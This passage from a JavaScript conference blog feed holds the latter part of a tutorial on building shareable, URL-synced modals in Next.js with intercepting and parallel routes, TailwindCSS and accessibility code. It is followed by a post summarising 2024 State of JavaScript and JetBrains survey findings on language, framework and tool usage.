2. Refresh behaviour:

Traditional modals lose their state when the page is refreshed. For example:

  • A user clicks a “Give Feedback” button, opening a modal.
  • They refresh the page, expecting the modal to stay open, but instead, it closes because the client-side state is reset. This disrupts the user experience, forcing users to repeat actions or lose their place in the workflow.

3. Inability to share modal states via URLs:
Consider a scenario where a user wants to share a particular modal with a colleague. With traditional client-side modals, there’s no URL representing the modal state, so the user can’t share or bookmark the modal. This makes the application less versatile and harder to navigate for users who expect modern, shareable interfaces.

How Next.js solves these challenges

Next.js provides a routing system that integrates seamlessly with modals, solving the challenges above. By leveraging features like intercepting routes and parallel routes, you can implement modals that are URL-synced, shareable, and persistent.

1.URL-based state for deep linking:
In Next.js, modal states can be tied directly to URLs. For example:

  • Navigating to /feedback can open a feedback form modal.
  • This URL can be shared or bookmarked, and refreshing the page will keep the modal open.
    This is achieved by associating modal components with specific routes in your file system, giving the modal a dedicated URL.

2.Preserving context and consistent navigation:
Unlike traditional modals, Next.js maintains navigation consistency. For example:

  • Pressing the back button closes the modal instead of navigating to the previous page.
  • Navigating forward reopens the modal, maintaining the user flow.
    These behaviours are automatically handled by Next.js’ routing system, reducing the need for custom logic and improving the user experience.


Next.js functions for creating shareable modals

Intercepting routes

Intercepting routes in Next.js allows you to “intercept” navigation to a specific route and render additional UI, such as a modal, without replacing the current page content. This is done using a special folder naming convention in your file system.

Implementation:

Intercepting route folder:

  • To create an interception route, use a folder prefixed with (.).
  • For example, if you wanted to intercept navigation to “/feedback” and display it as a modal, you would create the following structure:
  • app
    ├── @modal
    │   ├── (.)feedback
    │   │   └── page.tsx
    │   └── default.tsx
    ├── feedback
    │   └── page.tsx
  • app/feedback/page.tsx renders the full-page version of the feedback form.
  • app/@modal/(.)feedback/page.tsx renders the modal version.

Route behaviour:

  • Navigating directly to /feedback will render the full page (app/feedback/page.tsx).
  • Clicking on a “Give Feedback” button navigates to /feedback, but renders the modal (app/@modal/(.)feedback/page.tsx).

Example modal file:

Listing 1: 

import { Modal } from '@/components/modal';  
export default function FeedbackModal() {  
  return (  
    <Modal>  
      <h2 className="text-lg font-bold">Give Feedback</h2>  
      <form className="mt-4 flex flex-col gap-4">  
        <textarea  
          placeholder="Your feedback..."  
          className="border rounded-lg p-2"  
        />  
        <button  
          type="submit"  
          className="bg-blue-500 text-white py-2 px-4 rounded-lg"  
        >  
          Submit  
        </button>  
      </form>  
    </Modal>  
  );  
}  
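The listings import a Modal component from @/components/modal that is not shown in the article. A minimal, hypothetical implementation could look like the following; it closes the overlay with router.back() so that the intercepted route is rewound:

'use client';

// components/modal.tsx – hypothetical wrapper, not the article's actual component
import { useRouter } from 'next/navigation';
import type { ReactNode } from 'react';

export function Modal({ children }: { children: ReactNode }) {
  const router = useRouter();

  return (
    <div
      className="fixed inset-0 flex items-center justify-center bg-black/50"
      onClick={() => router.back()} // clicking the backdrop closes the modal
    >
      <div
        className="bg-white rounded-lg p-6 w-full max-w-md"
        onClick={(e) => e.stopPropagation()} // keep clicks inside the dialog from closing it
      >
        {children}
      </div>
    </div>
  );
}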

Parallel routes

Parallel routes allow multiple routes to be rendered simultaneously in different “slots” of the UI. This feature is particularly useful for rendering modals without disrupting the main layout.

Implementation:

Create a slot:

  • Parallel routes are implemented using folders prefixed with @. For example, @modal defines a slot for modal content.
  • In the root layout, you can include the modal slot next to the main page content.

Example layout file:

Listing 2:

// app/layout.tsx
import "./globals.css";

export default function RootLayout({
  modal,
  children,
}: {
  modal: React.ReactNode;
  children: React.ReactNode;
}) {
  return (
    <html lang="en">
      <body>
        <div>{modal}</div>
        <main>{children}</main>
      </body>
    </html>
  );
}

Fallback content:

  • Define a default.tsx file in the @modal folder to specify the fallback content when the modal is not active.

Listing 3:

// app/@modal/default.tsx
export default function Default() {
  return null; // No modal by default
}

 

Why these features matter

Intercepting routes in Next.js enable dynamic modal rendering without disrupting the layout of the main application. They allow you to associate specific modal components with their own URLs, making it possible to implement deep linking and sharing for modals. This ensures that users can navigate directly to a specific modal or share its state via a URL.

Parallel routes, on the other hand, separate the rendering logic of modals from the rest of the application. By isolating modal behaviour into its own designated slot, parallel routes simplify development and improve maintainability. This separation ensures that modals can be rendered independently, without interfering with the layout or functionality of other parts of the application.

By combining intercepting and parallel routes, Next.js transforms the way modals are implemented. These features make modals more user-friendly by supporting modern navigation patterns and sharing capabilities, while also enhancing developer efficiency through cleaner, more modular code.


Building a feedback modal in Next.js with TailwindCSS

Step 1: Setting up the /feedback route

The /feedback route serves as the main feedback page. TailwindCSS is used to style the form and layout.

Listing 4:

// app/feedback/page.tsx
export default function FeedbackPage() {
  return (
    <main className="flex flex-col items-center justify-center min-h-screen bg-gray-100">
      <h1 className="text-2xl font-bold text-gray-800">Feedback</h1>
      <p className="text-gray-600">We’d love to hear your thoughts!</p>
      <form className="mt-4 flex flex-col gap-4 w-full max-w-md">
        <textarea
          className="border border-gray-300 rounded-lg p-2 resize-none focus:outline-none focus:ring-2 focus:ring-blue-500"
          placeholder="Your feedback..."
          rows={4}
        />
        <button
          type="submit"
          className="bg-blue-500 text-white py-2 px-4 rounded-lg hover:bg-blue-600 transition"
        >
          Submit
        </button>
      </form>
    </main>
  );
}

Step 2: Define the @modal slot

The @modal slot ensures that no modal is rendered unless explicitly triggered.

Listing 5:

// app/@modal/default.tsx
export default function Default() {
  return null; // Ensures the modal is not active by default
}


Step 3: Implement the modal in the /(.)feedback folder

This step uses the intercepting route pattern (.) to render the modal in the @modal slot.

Listing 6:

// app/@modal/(.)feedback/page.tsx
import { Modal } from '@/components/modal';

export default function FeedbackModal() {
  return (
    <Modal>
      <h2 className="text-lg font-bold text-gray-800">Give Feedback</h2>
      <form className="mt-4 flex flex-col gap-4">
        <textarea
          className="border border-gray-300 rounded-lg p-2 resize-none focus:outline-none focus:ring-2 focus:ring-blue-500"
          placeholder="Your feedback..."
          rows={4}
        />
        <button
          type="submit"
          className="bg-blue-500 text-white py-2 px-4 rounded-lg hover:bg-blue-600 transition"
        >
          Submit
        </button>
      </form>
    </Modal>
  );
}

Step 4: Create the reusable modal component

The modal is styled using TailwindCSS for a modern and accessible design.

Listing 7:

// components/modal.tsx
'use client';

import { useRouter } from 'next/navigation';

export function Modal({ children }: { children: React.ReactNode }) {
  const router = useRouter();

  return (
    <div className="fixed inset-0 flex items-center justify-center bg-black bg-opacity-50 z-50">
      <div className="bg-white rounded-lg shadow-lg max-w-md w-full p-6 relative">
        <button
          onClick={() => router.back()}
          aria-label="Close"
          className="absolute top-2 right-2 text-gray-400 hover:text-gray-600"
        >
          ✖
        </button>
        {children}
      </div>
    </div>
  );
}

Step 5: Update the layout for parallel routing

In the layout, the @modal slot is rendered next to the primary children prop:

Listing 8:

// app/layout.tsx
import Link from 'next/link';
import './globals.css';

export default function RootLayout({
  modal,
  children,
}: {
  modal: React.ReactNode;
  children: React.ReactNode;
}) {
  return (
    <html lang="en">
      <body className="bg-gray-100 text-gray-900">
        <nav className="bg-gray-800 p-4 text-white">
          <Link
            href="/feedback"
            className="hover:underline text-white"
          >
            Give Feedback
          </Link>
        </nav>
        <div>{modal}</div>
        <main className="p-4">{children}</main>
      </body>
    </html>
  );
}

You can find the complete implementation using TailwindCSS, including accessibility enhancements, on my GitHub repository.

Advanced features and enhancements

Accessibility improvements

Accessibility is critical when creating modals. Without proper implementation, modals can confuse users, especially those who rely on screen readers or keyboard navigation. Here are some key practices to ensure that your modal is accessible:

Focus management

When a modal is opened, the focus should be moved to the first interactive element within the modal, and users should not be able to interact with elements outside the modal. In addition, when the modal is closed, the focus should return to the element that triggered it.

This can be achieved by using JavaScript to trap focus within the modal:

Listing 9:

// Updated Modal Component with Focus Management
'use client';

import { useEffect, useRef } from 'react';
import { useRouter } from 'next/navigation';

export function Modal({ children }: { children: React.ReactNode }) {
  const router = useRouter();
  const modalRef = useRef<HTMLDivElement>(null);

  useEffect(() => {
    const focusableElements = modalRef.current?.querySelectorAll(
      'button, [href], input, textarea, select, [tabindex]:not([tabindex="-1"])'
    );
    const firstElement = focusableElements?.[0] as HTMLElement;
    const lastElement = focusableElements?.[focusableElements.length - 1] as HTMLElement;

    // Trap focus within the modal
    function handleTab(e: KeyboardEvent) {
      if (!focusableElements || focusableElements.length === 0) return;

      if (e.key === 'Tab') {
        if (e.shiftKey && document.activeElement === firstElement) {
          e.preventDefault();
          lastElement?.focus();
        } else if (!e.shiftKey && document.activeElement === lastElement) {
          e.preventDefault();
          firstElement?.focus();
        }
      }
    }

    // Set initial focus to the first interactive element
    firstElement?.focus();

    window.addEventListener('keydown', handleTab);
    return () => window.removeEventListener('keydown', handleTab);
  }, []);

  return (
    <div
      ref={modalRef}
      role="dialog"
      aria-modal="true"
      className="fixed inset-0 flex items-center justify-center bg-black bg-opacity-50 z-50"
    >
      <div className="bg-white rounded-lg shadow-lg max-w-md w-full p-6 relative">
        <button
          onClick={() => router.back()}
          aria-label="Close"
          className="absolute top-2 right-2 text-gray-400 hover:text-gray-600"
        >
          ✖
        </button>
        {children}
      </div>
    </div>
  );
}

Focus trapping is essential for maintaining a seamless and accessible user experience when working with modals. It ensures that users cannot accidentally navigate or interact with elements outside the modal while it is open, preventing confusion and unintended actions. Additionally, returning focus to the element that triggered the modal provides a smooth transition when the modal is closed, helping users reorient themselves and continue interacting with the application without disruption. These practices enhance both usability and accessibility, creating a more polished and user-friendly interface.
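
Listing 9 covers the focus trap itself; returning focus to the trigger element is not shown there. A minimal sketch of how it could be added – an extra effect inside the same Modal component, declared before the focus-trap effect so it captures the trigger rather than the modal's first element, and assuming the trigger is still in the DOM when the modal unmounts:

// Additional effect inside the Modal component from Listing 9
useEffect(() => {
  // Capture whichever element had focus before the modal took over.
  const previouslyFocused = document.activeElement as HTMLElement | null;

  return () => {
    // When the modal unmounts (e.g. after router.back()),
    // hand focus back to the element that opened it.
    previouslyFocused?.focus();
  };
}, []);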

ARIA attributes

Using semantic HTML and ARIA attributes ensures that screen readers understand the structure and purpose of the modal.

  • Add role="dialog" to the modal container to define it as a dialog window.
  • Use aria-modal="true" to indicate that interaction with elements outside the modal is restricted.

Why this is important:
ARIA attributes provide assistive technologies such as screen readers with the necessary context to communicate the purpose of the modal to the user. This ensures a consistent and inclusive user experience.
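
As a small, hypothetical enhancement to the article's example, the dialog container from Listing 9 can also be labelled by the modal's heading so screen readers announce its purpose (the id feedback-modal-title is made up for illustration; only the relevant elements are shown):

// components/modal.tsx – the container from Listing 9, labelled by its heading
<div
  ref={modalRef}
  role="dialog"
  aria-modal="true"
  aria-labelledby="feedback-modal-title"
  className="fixed inset-0 flex items-center justify-center bg-black bg-opacity-50 z-50"
>

// app/@modal/(.)feedback/page.tsx – give the heading the matching id
<h2 id="feedback-modal-title" className="text-lg font-bold text-gray-800">
  Give Feedback
</h2>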

Error handling and edge cases

Handling edge cases ensures that your modal behaves predictably in all scenarios. Here are some considerations:

Handle refreshes

Since the modal state is tied to the URL, refreshing the page should display the appropriate content. In Next.js, this happens naturally due to the server-rendered /feedback route and the modal implementation.

Close modal on invalid routes

If the user navigates to an invalid route, the modal should close or render nothing. A catch-all route ([...catchAll]) in the @modal slot ensures this:

// e.g. app/@modal/[...catchAll]/page.tsx
export default function CatchAll() {
  return null; // Ensures the modal slot is empty
}

Smooth navigation

Ensure that navigating to another part of the application closes the modal. Using router.back() in the modal close button ensures that the user is returned to the previous route.

Listing 10:

<button
  onClick={() => router.back()}
  aria-label="Close"
  className="absolute top-2 right-2 text-gray-400 hover:text-gray-600"
>
  ✖
</button>
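
Keyboard users also expect Escape to dismiss a dialog. Because the modal's lifetime is tied to the route, the same router.back() call can be wired to a keydown listener – a minimal sketch of an extra effect inside the Modal component from Listing 9:

// Close the modal with the Escape key by navigating back
useEffect(() => {
  function handleEscape(e: KeyboardEvent) {
    if (e.key === 'Escape') {
      router.back();
    }
  }

  window.addEventListener('keydown', handleEscape);
  return () => window.removeEventListener('keydown', handleEscape);
}, [router]);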

Why it matters:

Graceful navigation plays a key role in providing a consistent and predictable user experience, even when users interact with modals in unexpected ways. By ensuring that modal behaviour aligns with navigation actions, such as using the back or forward buttons, users can move through the application naturally without encountering inconsistencies.

Catch-all routes further enhance robustness by preventing unnecessary or unintended content from being rendered in the modal slot. They act as a safeguard, ensuring that only valid routes display content, while invalid or undefined routes leave the modal slot empty. Together, these strategies create a more reliable and user-friendly application.


Comparison and use cases

Comparison: URL-synced modals vs. traditional client-side modals

When building modals, developers often rely on client-side state management to control their visibility. While this approach is straightforward, it has several limitations compared to URL-synced modals in Next.js:

Feature | Client-side modals | URL-synced modals in Next.js
Deep Linking | Not supported. Users can’t share or bookmark the modal state. | Fully supported. Modal states are linked to specific URLs.
Refresh Behaviour | When the page is refreshed, the modal state is reset and closed. | The modal state persists across refreshes.
Navigation Consistency | Backwards or forward navigation cannot close or reopen the modal. | Modals respect browser navigation, closing or reopening correctly.
Scalability | State management for complex modals can be difficult in large applications. | Simplified state management using URL routes.
SEO and Accessibility | Modals are not indexed or accessible via URLs. | Can be indexed and shared where appropriate.

Why URL-synchronised modals are important:

These features significantly enhance the user experience by enabling deep linking, allowing users to share and bookmark specific modal states with ease. Navigation consistency ensures that actions like using the back or forward buttons behave as expected, seamlessly opening or closing modals without disrupting the flow of the application. For developers, Next.js simplifies state management by leveraging its routing mechanisms, eliminating the need for complex custom logic to control modal behaviour. This combination of improved usability and reduced development complexity makes Next.js an ideal framework for building modern, shareable modals.

Practical use cases for URL-synced modals

Next.js makes URL-synced modals versatile and scalable. Here are a few common use cases:

Feedback forms

As this article shows, feedback forms are ideal for modals. Users can easily share a link to the form (/feedback), and the form remains accessible even after a page refresh.

Photo galleries with previews

Imagine a gallery where users can click on a thumbnail to open a photo preview in a modal. With URL-synchronised modals:

  • Clicking on a photo updates the URL (e.g. /gallery/photo/123).
  • Users can share the link, allowing others to view the photo directly.
  • Navigating backwards or forwards closes or reopens the modal.
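
Structurally, this is the same pattern as the feedback example. The sketch below is hypothetical – it uses a simplified /photo/[id] URL rather than the nested /gallery/photo/123 path, and note that newer Next.js versions hand params to the page as a Promise that must be awaited:

app
├── @modal
│   ├── (.)photo
│   │   └── [id]
│   │       └── page.tsx   (modal preview)
│   └── default.tsx
├── photo
│   └── [id]
│       └── page.tsx       (full-page view)

// app/@modal/(.)photo/[id]/page.tsx – hypothetical modal preview
import { Modal } from '@/components/modal';

export default function PhotoModal({ params }: { params: { id: string } }) {
  return (
    <Modal>
      {/* In a real application you would look the photo up by params.id */}
      <img
        src={`/photos/${params.id}.jpg`}
        alt={`Photo ${params.id}`}
        className="rounded-lg"
      />
    </Modal>
  );
}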

Shopping carts and side panels

E-commerce applications often use modals for shopping carts. With URL-synced modals:

  • The cart can be linked to a route such as /cart.
  • Users can share their cart link with preloaded items.
  • Refreshing the page keeps the cart open, preventing it from losing its state.

Authentication and login

For applications that require authentication, login forms can be presented as modals. A user clicking "Login" could open a modal linked to /login. When the modal is closed or the user navigates elsewhere, the state remains predictable.

Notifications and wizards

  • Notifications: Display announcements or updates in a modal tied to a route, such as /announcement.
  • Onboarding Wizards: Guide users through a multistep onboarding process, with each step linked to a unique URL (e.g. /onboarding/step-1).

When to avoid URL-synced modals

Although URL-synced modals are powerful, they are not appropriate for every scenario. Consider avoiding them in the following cases:

  • Highly transient states: Modals used for brief interactions (such as confirming a delete action) may not require URL updates.
  • Sensitive data: If the modal contains sensitive information, ensure that deep linking and sharing are restricted.
  • Non-navigable workflows: If the modal does not require navigation controls (e.g. forward/backwards), simpler client-side modals may be sufficient.

With these comparisons and use cases, developers can make informed decisions about when and how to implement URL-synced modals in their Next.js projects.


Conclusion

URL-synchronised modals in Next.js provide a modern solution to the common challenges developers face when implementing modals in web applications. By leveraging features such as intercepting and parallel routes, Next.js enables deep linking, navigation consistency, and improved user experience – all while simplifying state management.

Key Takeaways

  1. Improved user experience:
    URL-synchronised modals allow users to share, bookmark, and revisit specific modal states without breaking functionality. They also respect browser navigation, ensuring that modals open and close as expected.
  2. Simplified state management:
    By tying modal states to the URL, developers can avoid the complexity of managing client-side state for modals in large applications.
  3. Broad applicability:
    From feedback forms and photo galleries to shopping carts and onboarding wizards, URL-synced modals provide a scalable and reusable solution for multiple use cases.

Recommendations:

  • Use Next.js’ intercepting and parallel routes to create modals that integrate seamlessly into your application.
  • Focus on accessibility by implementing ARIA roles, focus trapping, and logical navigation.
  • Evaluate whether URL-synced modals are appropriate for your specific use case, especially when dealing with transient or sensitive data.

For a complete example of building a feedback modal with URL-synced functionality in Next.js, check out my GitHub repository.

If you’re ready to take your Next.js projects to the next level, try implementing URL-synced modals today. They are not only user-friendly but also developer-friendly, making them a great addition to any modern web application.

 

The post Shareable Modals in Next.js: URL-Synced Overlays Made Easy appeared first on International JavaScript Conference.

The 2024 State of JavaScript Survey: Who’s Taking the Lead? https://javascript-conference.com/blog/state-of-javascript-ecosystem-2024/ Wed, 05 Feb 2025 10:48:23 +0000 https://javascript-conference.com/?p=107421 Dominating frontend development, JavaScript continues to be one of the most widely used programming languages and the cornerstone of web development. As we step into 2025, we’ll take a closer look at the state of JavaScript in 2024, highlighting the major trends and the most popular frameworks so you can stay ahead of the curve.

The post The 2024 State of JavaScript Survey: Who’s Taking the Lead? appeared first on International JavaScript Conference.

The State of Developer Ecosystem Report 2024 by JetBrains gives a snapshot of the developer world, based on insights from 23,262 developers worldwide. The survey shows that JavaScript remains the most-used programming language globally, with 61% of developers using it to build web pages.


Figure 1: Which programming languages have you used in the last 12 months? (source: JetBrains)

Key Takeaways

  • Demographically, the U.S. represented a large share of respondents with 15%, followed by Germany at 8%, France at 7%, and Spain and the United Kingdom at 4% each.
  • The average age of survey respondents was 33.5 years. Age and income were positively correlated, and younger respondents showed more gender diversity, suggesting changing demographics.
  • 51% of participants had 10 years or less of experience, while 33% had between 10 and 20 years of experience.
  • 95% of respondents used JavaScript in a professional capacity, and 40% used it as a hobby in 2024, up from 91% and 37% in 2023.
  • 98% reported using JavaScript for frontend development and 64% for backend. Additionally, 26% used it for mobile apps and 18% for desktop apps.

Figure 2: JavaScript use case (source: State of JS)

 

The most common application patterns remain the classic ones: Single-Page Apps (90%) and Server-Side Rendering (59%). Static Site Generation came in third position with 46%.

The survey also looked at AI usage to generate code. 20% of respondents said they never use it for coding, while 7% reported using it about half the time.


TypeScript vs. JavaScript

TypeScript has seen impressive growth, as its adoption has risen from 12% in 2017 to 35% in 2024, according to JetBrains’ report. 67% of respondents reported writing more TypeScript than JavaScript code, and the largest group consists of people who only write TypeScript.

Figure 3: TypeScript usage (source: State of JS)

 

TypeScript’s popularity is due to its enhanced features to write better JavaScript code. It detects errors early during development, improves code quality, and makes long-term maintenance easier, which is a huge plus for developers. However, TypeScript isn’t here to replace JavaScript. They’ll just coexist, giving developers more options based on what they need and prefer.
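
A small, made-up example of the kind of mistake TypeScript catches at compile time rather than letting it slip through at runtime:

interface Survey {
  year: number;
  respondents: number;
}

function totalRespondents(a: Survey, b: Survey): number {
  return a.respondents + b.respondents;
}

// Plain JavaScript would silently concatenate the string and return "2326221000";
// TypeScript rejects the call before the code ever runs:
// totalRespondents({ year: 2024, respondents: 23262 }, { year: 2023, respondents: "21000" });
// Error: Type 'string' is not assignable to type 'number'.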

Libraries and Frameworks

Webpack is the most used JavaScript tool, as 85.3% of respondents reported using it. However, Vite takes the lead for the most loved, earning 56% of positive feedback. Despite being relatively new, Vite is also the third most used tool with 78.1% adoption.

React came in second for both most used (81.1%) and most loved (46.7%). 

Angular, on the other hand, ranked eighth with 50.1% usage and 23.3% positive feedback, falling behind tools like Jest, Next.js, Storybook, and Vue.js.


Figure 4: Libraries experience grouped by usage (source: State of JS)

Figure 5: Libraries experience grouped by sentiment (source: State of JS)

The survey also highlights usage trends of frontend frameworks over time. While React remains in the top spot, Vue.js continues to overtake Angular, holding on to its position as the second most used framework.

React keeps reinventing itself, evolving from a standalone library into a specification for frameworks. With the release of version 19 in December, it introduced support for web components along with new hooks and form actions that redefine how forms are handled in React.

Vue.js’ popularity can be attributed to its flexible, comprehensive, and advanced features, which appeal to both beginners and experienced developers. Daniel Roe from the Nuxt core team credits the ecosystem’s growth to its UI libraries, with Tailwind CSS playing a key role. Its convention-based approach and cross-framework compatibility make it easier to port libraries like Radix Vue from their React counterparts. 

Angular’s third-place ranking is still a good position, as many developers and companies continue to use it for its performance, safety, and scalability. Its ecosystem, TypeScript integration, and features like dependency injection still make it an attractive choice for web development.  

Svelte’s usage is also growing steadily, with developers showing increasing favor for it after it released version 5 in October. According to Best of JS, one of its major highlights is the introduction of “runes,” a new mechanism for declaring reactive state.

Figure 6: Frontend frameworks ratios over time (source: State of JS)


Challenges and Limitations  

When asked about their biggest struggle with JavaScript, 32% of respondents pointed to the lack of a built-in type system, far ahead of browser support issues, which only 8% mentioned.

Regarding browser APIs, poor browser support was the biggest issue for 35% of respondents. Safari and the lack of documentation on browser features also came up as common problems with 6% and 5% mentions, respectively.

React, as the most used frontend framework, was also the most criticized, with 14% of respondents reporting issues with it. Common complaints about frameworks included excessive complexity, poor performance, choice overload, and breaking changes.

It’s exciting to see how the JavaScript ecosystem will develop in 2025, unlocking new possibilities for web development. TypeScript’s growing adoption will solidify its position as a standard for large-scale applications, thanks to its type safety and improved developer tooling. We’ll also see the continued rise of server-side rendering (SSR) frameworks like Next.js and Nuxt.js, enhancing both performance and SEO. Additionally, React and Angular will continue to push forward with updates focused on optimizing the developer experience and simplifying app development. If you’re interested in diving deeper into these topics, make sure to check out our conference program for more insights and expert-led sessions!

If you want to get more details, check the JavaScript Survey page.

The post The 2024 State of JavaScript Survey: Who’s Taking the Lead? appeared first on International JavaScript Conference.
